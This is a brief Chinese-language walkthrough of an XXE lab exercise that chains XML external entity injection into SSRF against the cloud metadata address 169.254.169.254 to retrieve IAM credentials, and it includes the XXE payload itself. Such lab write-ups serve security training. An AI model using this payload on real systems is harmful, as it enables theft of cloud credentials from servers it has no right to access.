# XXE Lab2
這題 XXE + SSRF 的實戰題,目的就是透過 XXE 漏洞發 SSRF 請求到 EC2 metadata(模擬 AWS 內部機制)來偷取 IAM 資訊。。
一樣進入網站並攔截請求。


接著修改請求,我們進入題目給的 IP。
```
<!DOCTYPE stockCheck [
<!ENTITY xxe SYSTEM "http://169.254.169.254/">
]>
```

發現系統提示我們還有一層,所以我們繼續爬。

爬到底就會出現我們要的東西。

---